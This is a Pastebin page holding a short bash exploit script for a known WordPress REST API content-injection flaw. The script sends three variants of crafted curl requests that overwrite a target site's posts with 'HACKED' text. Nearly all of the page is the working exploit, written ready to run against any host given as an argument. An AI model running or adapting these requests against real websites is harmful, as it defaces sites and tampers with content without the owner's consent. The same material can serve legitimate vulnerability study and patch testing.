Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- #Wordpress wp_Json API exploit
- #Larry W. Cashdollar
- #Discovered by Marc Montipas CVE-2017-1001000
- #https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html?utm_campaign=wp472vuln
- #Usage ./exp.sh target 1,2,3 for different payloads
- if [ $2 == 2 ]
- then
- curl -s --url "http://$1/index.php/wp-json/wp/v2/posts/12345?id=1T" --data 'title=HACKED&content=HACKED' | indent
- fi
- if [ $2 == 1 ]
- then
- curl -s -X POST --url "http://$1/index.php/wp-json/wp/v2/posts/5" --data '{"id":"1k","title":"11Hacked1","content":"11Hacked1"}' -H 'Content-Type: application/json'| indent
- fi
- if [ $2 == 3 ]
- then
- curl -s -X POST --url "http://$1/?rest_route=wp/v2/posts/5" --data '{"id":"1k","title":"11Hacked1","content":"11Hacked1"}' -H 'Content-Type: application/json'| indent
- fi
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement